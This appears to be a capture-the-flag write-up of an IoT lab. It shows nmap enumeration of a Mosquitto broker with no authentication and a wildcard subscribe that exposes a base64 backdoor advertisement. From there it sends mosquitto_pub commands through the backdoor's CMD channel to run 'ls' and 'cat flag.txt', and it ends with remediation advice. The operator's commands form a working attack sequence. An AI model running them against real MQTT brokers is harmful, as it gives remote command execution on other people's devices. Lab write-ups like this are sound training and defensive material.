Case file

MQTT wildcard subscribe and backdoor CMD channel to flag

Foundations IoT engagement: Mosquitto broker accepted wildcard subscribe; a base64-encoded backdoor advertisement exposed pub/sub topics and a CMD interface that executed cat flag.txt.

Foundations18 minMQTT · IoT · Command Injection · Network Enumeration
01

Engagement summary

Nmap found MQTT; mosquitto_sub on # captured a backdoor JSON; formatted CMD messages on the sub topic returned directory listings and flag.txt contents.

BUGGED presented as a smart-home appliance network with anomalous broker traffic. Service scan identified Mosquitto. Subscribing to topic # with mosquitto_sub immediately received a base64 blob advertising a backdoor: registered commands HELP/CMD/SYS plus dedicated pub and sub topic paths. Publishing malformed probes to the sub topic returned a base64 error describing the required JSON shape {id, cmd, arg}. A correctly framed CMD with arg ls listed flag.txt; CMD with arg cat flag.txt returned the engagement secret over the pub topic. No authentication on the broker; full remote command channel via MQTT.

Business impact

Unauthenticated MQTT brokers are remote shells when devices expose command topics. IoT backdoors riding production messaging buses exfiltrate filesystem data without touching HTTP. Require mutual TLS, ACLs per client, and deny wildcard subscribe for untrusted principals.

02

Wildcard subscribe and backdoor decode

Installed Mosquitto clients; subscribed to #; decoded advertisement JSON for pub/sub topics and CMD.

OPERATOR · MQTT

savvy@lab:~$ sudo nmap -sV -sC 10.10.10.10

1883/tcp open mqtt Mosquitto

savvy@lab:~$ mosquitto_sub -t "#" -h 10.10.10.10

eyJpZCI6ImNkZDFiMWMwLTFjNDAtNGIwZi04ZTIyLTYxYjM1NzU0OGI3ZCIsInJlZ2lzdGVyZWRfY29tbWFuZHMiOlsiSEVMUCIsIkNNRCIsIlNZUyJdLCJwdWJfdG9waWMiOiJVNHZ5cU5sUXRmLzB2b3ptYVp5TFQvMTVIOVRGNkNIZy9wdWIiLCJzdWJfdG9waWMiOiJYRDJyZlI5QmV6L0dxTXBSU0VvYmgvVHZMUWVoTWcwRS9zdWIifQ==

savvy@lab:~$ echo "eyJpZCI6..." | base64 -d | jq .

id, registered_commands:[HELP,CMD,SYS], pub_topic, sub_topic

BACKDOOR ADVERTISEMENT

backdoor.json

{
  "id": "cdd1b1c0-1c40-4b0f-8e22-61b357548b7d",
  "registered_commands": ["HELP", "CMD", "SYS"],
  "pub_topic": "U4vyqNlQtf/0vozmaZyLT/15H9TF6CHg/pub",
  "sub_topic": "XD2rfR9Bez/GqMpRSEobh/TvLQehMg0E/sub"
}
03

CMD channel execution to flag.txt

Published base64 CMD envelopes on sub_topic; responses on pub_topic included flag contents.

OPERATOR · CMD

savvy@lab:~$ mosquitto_sub -t "U4vyqNlQtf/.../pub" -h 10.10.10.10 &

savvy@lab:~$ MSG=$(echo '{"id":"cdd1b1c0-...","cmd":"CMD","arg":"ls"}' | base64 -w0)

savvy@lab:~$ mosquitto_pub -t "XD2rfR9Bez/.../sub" -m "$MSG" -h 10.10.10.10

response → flag.txt

savvy@lab:~$ MSG=$(echo '{"id":"cdd1b1c0-...","cmd":"CMD","arg":"cat flag.txt"}' | base64 -w0)

savvy@lab:~$ mosquitto_pub -t "XD2rfR9Bez/.../sub" -m "$MSG" -h 10.10.10.10

flag{18d44fc0707ac8dc8be45bb83db54013}

Remediation

Authenticate every MQTT client; scope ACLs so devices cannot advertise or consume command topics. Disable or air-gap debug backdoors before production. Monitor base64 blobs on messaging buses as IoC material.